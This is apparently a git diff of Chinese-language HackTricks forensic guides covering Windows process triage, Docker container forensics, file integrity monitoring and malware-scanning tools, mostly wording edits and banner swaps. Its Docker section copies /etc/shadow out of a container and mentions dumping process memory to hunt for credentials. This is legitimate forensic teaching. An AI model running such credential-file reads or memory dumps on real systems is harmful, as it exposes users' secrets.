这是负责**用户桌面**和通过文件扩展名启动文件的进程。 -**每个已登录用户**应该生成**只有1个**进程。 +**每个已登录用户**应该生成**仅 1 个进程**。 -这是从**userinit.exe**运行的,应该被终止,因此此进程的**没有父进程**应该出现。 +这是从 **userinit.exe** 运行的,应该被终止,因此此进程的**父进程**中不应该出现任何内容。 # 捕获恶意进程 -* 它是否从预期路径运行?(没有Windows二进制文件从临时位置运行) -* 它是否与奇怪的IP通信? -* 检查数字签名(Microsoft工件应该被签名) +* 它是否从预期路径运行?(没有 Windows 二进制文件从临时位置运行) +* 它是否与奇怪的 IP 进行通信? +* 检查数字签名(Microsoft 的工件应该是签名的) * 拼写正确吗? -* 是否在预期SID下运行? +* 是否在预期的 SID 下运行? * 父进程是否是预期的(如果有的话)? -* 子进程是否是预期的?(没有cmd.exe、wscript.exe、powershell.exe..?) +* 子进程是否是预期的?(没有 cmd.exe、wscript.exe、powershell.exe..?) + + +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 **HackTricks** 和 **HackTricks Cloud** 的 github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 7ce7ec293..72c6d4e4f 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ # Docker取证 +{% hint style="success" %} +学习并实践AWS Hacking:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践GCP Hacking:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} ## 容器修改 @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -您可以轻松地使用以下命令查找有关此容器对镜像所做修改: +您可以使用以下命令轻松**查找对此容器所做的与镜像相关的修改**: ```bash docker diff wordpress C /var @@ -47,13 +48,13 @@ docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` -如果发现**添加了一些可疑文件**,您可以访问容器并进行检查: +如果发现**已添加一些可疑文件**,您可以访问容器并进行检查: ```bash docker exec -it wordpress bash ``` ## 图像修改 -当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来 **提取修改的摘要**: +当您获得一个导出的 Docker 镜像(可能是 `.tar` 格式)时,您可以使用 [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) 来**提取修改的摘要**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar @@ -70,7 +71,7 @@ tar -xf image.tar ```bash docker inspect ``` -您还可以使用以下命令获取**更改历史记录摘要**: +您还可以使用以下命令获取**更改历史摘要**: ```bash docker history --no-trunc ``` @@ -90,16 +91,31 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -这使您能够**浏览Docker镜像的不同blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。 +这允许您**浏览 Docker 镜像的不同 blob**,并检查哪些文件已被修改/添加。**红色**表示已添加,**黄色**表示已修改。使用**tab**键切换到其他视图,使用**空格**键折叠/打开文件夹。 -使用die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压缩每个层并访问它**。\ -您可以从解压缩镜像的目录中解压缩图像的所有层,执行: +使用 die,您将无法访问镜像不同阶段的内容。要这样做,您需要**解压每个层并访问它**。\ +您可以从解压缩镜像的目录中解压缩镜像的所有层,执行: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` -## 从内存中获取凭据 +## 从内存中获取凭证 -请注意,当您在主机内运行一个docker容器时,**您可以从主机上运行`ps -ef`命令来查看容器中运行的进程** +请注意,当您在主机内运行一个 Docker 容器时,**您可以从主机上运行 `ps -ef` 命令来查看容器中运行的进程** -因此(作为root用户)您可以从主机中**转储进程的内存**,并搜索凭据,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。 +因此(作为 root 用户)您可以从主机中**转储进程的内存**,并搜索**凭证**,就像[**以下示例**](../../linux-hardening/privilege-escalation/#process-memory)中一样。 + +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 848f8828d..625ca6487 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,30 +1,31 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} # 基线 -基线包括对系统的某些部分进行快照,以便**将来与之进行比较以突出变化**。 +基线包括对系统的某些部分进行快照,以便与将来的状态进行比较以突出变化。 例如,您可以计算并存储文件系统中每个文件的哈希值,以便找出哪些文件已被修改。\ -还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太多变化的事物进行此操作。 +还可以对创建的用户帐户、运行的进程、运行的服务以及任何其他不应该或根本不应该发生太大变化的事物进行此操作。 ## 文件完整性监控 -文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护IT环境和数据。它包括两个关键步骤: +文件完整性监控(FIM)是一种关键的安全技术,通过跟踪文件的更改来保护 IT 环境和数据。它包括两个关键步骤: -1. **基线比较:** 使用文件属性或加密校验和(如MD5或SHA-2)建立基线,以便将来进行比较以检测修改。 +1. **基线比较:** 使用文件属性或加密校验和(如 MD5 或 SHA-2)建立基线,以便将来进行比较以检测修改。 2. **实时更改通知:** 当文件被访问或更改时立即收到警报,通常通过操作系统内核扩展。 ## 工具 @@ -32,21 +33,22 @@ * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -# 参考资料 +## 参考资料 * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index fc04b15ed..82246fe8c 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # 恶意软件分析 +{% hint style="success" %} +学习并练习 AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## 取证备忘单 @@ -37,7 +38,7 @@ sudo apt-get install -y yara #### 准备规则 使用此脚本从 github 下载并合并所有 yara 恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -创建 _**rules**_ 目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。 +创建名为 _**rules**_ 的目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。 ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules @@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它会发现诸如Att\&ck战术或可疑功能,例如: +**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它将查找诸如Att\&ck战术或可疑功能,例如: - 检查OutputDebugString错误 - 作为服务运行 @@ -80,14 +81,14 @@ clamscan folderpath #Scan the whole folder ### IOCs IOC表示威胁指标。IOC是一组**用于识别**一些潜在不受欢迎的软件或已确认**恶意软件**的条件。蓝队使用这种定义来在其**系统**和**网络**中**搜索此类恶意文件**。\ -共享这些定义非常有用,因为当在计算机中识别恶意软件并为该恶意软件创建IOC时,其他蓝队可以使用它更快地识别恶意软件。 +共享这些定义非常有用,因为当在计算机中识别出恶意软件并为该恶意软件创建了一个IOC时,其他蓝队可以使用它更快地识别出该恶意软件。 -创建或修改IOC的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\ -您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOC**。 +创建或修改IOCs的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\ +您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOCs**。 ### Loki -[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描器。\ +[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描程序。\ 检测基于四种检测方法: ``` 1. File Name IOC @@ -104,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux 恶意软件检测 -[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的数据,使用 LMD 结账功能以及恶意软件社区资源。 +[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在针对共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中活跃使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的具有 LMD 检出功能和恶意软件社区资源。 ### rkhunter @@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术在可执行文件中查找混淆的字符串。 +[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术来查找可执行文件中的混淆字符串。 ### PEpper @@ -122,23 +123,23 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEstudio -[PEstudio](https://www.winitor.com/download) 是一个工具,可以获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。 +[PEstudio](https://www.winitor.com/download) 是一个工具,允许获取有关 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。 ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否加密,并查找打包程序。 +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否**加密**,还可以找到**打包程序**。 ### NeoPI -[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种统计方法来检测文本/脚本文件中混淆和加密内容的 Python 脚本。NeoPI 的预期目的是帮助检测隐藏的 Web shell 代码。 +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种**统计方法**来检测文本/脚本文件中的**混淆**和**加密**内容的 Python 脚本。NeoPI 的预期目的是帮助**检测隐藏的 Web shell 代码**。 ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测混淆/可疑代码以及使用 PHP 函数的文件,这些函数通常在恶意软件/webshell 中使用。 +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测**混淆**/**可疑代码**以及使用**经常用于**恶意软件**/Web shell 的**PHP**函数的文件。 ### Apple 二进制签名 -在检查一些恶意软件样本时,您应始终检查二进制文件的签名,因为签署它的开发人员可能已与恶意软件相关联。 +在检查一些**恶意软件样本**时,您应始终**检查二进制签名**,因为签署它的**开发人员**可能已与**恶意软件**有关。 ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -153,7 +154,7 @@ spctl --assess --verbose /Applications/Safari.app ### 文件堆叠 -如果你知道某个包含**web服务器文件**的文件夹是在**某个日期**上次更新的。**检查**所有**web服务器文件**的创建和修改日期,如果有任何**可疑日期**,则检查该文件。 +如果你知道某个包含**web服务器文件**的文件夹是在**某个日期**上次更新的。**检查**一下**web服务器中所有文件**的创建和修改日期,如果有任何**可疑日期**,就检查那个文件。 ### 基线 @@ -161,4 +162,19 @@ spctl --assess --verbose /Applications/Safari.app ### 统计分析 -当信息保存在日志中时,你可以**检查统计数据,比如每个web服务器文件被访问的次数,因为web shell可能是其中之一**。 +当信息保存在日志中时,你可以**检查统计数据,比如web服务器的每个文件被访问的次数,因为其中可能包含web shell**。 + +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持HackTricks + +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。 + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76a99f9f3..a1566c9ab 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**。 +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} 在这里,您可以找到特定文件类型和/或软件的有趣技巧: @@ -37,16 +38,17 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**。 +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 7844744e6..c9a06b9a1 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -一些有助于调试/反混淆恶意VBS文件的方法: +一些有用的内容,可用于调试/反混淆恶意 VBS 文件: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 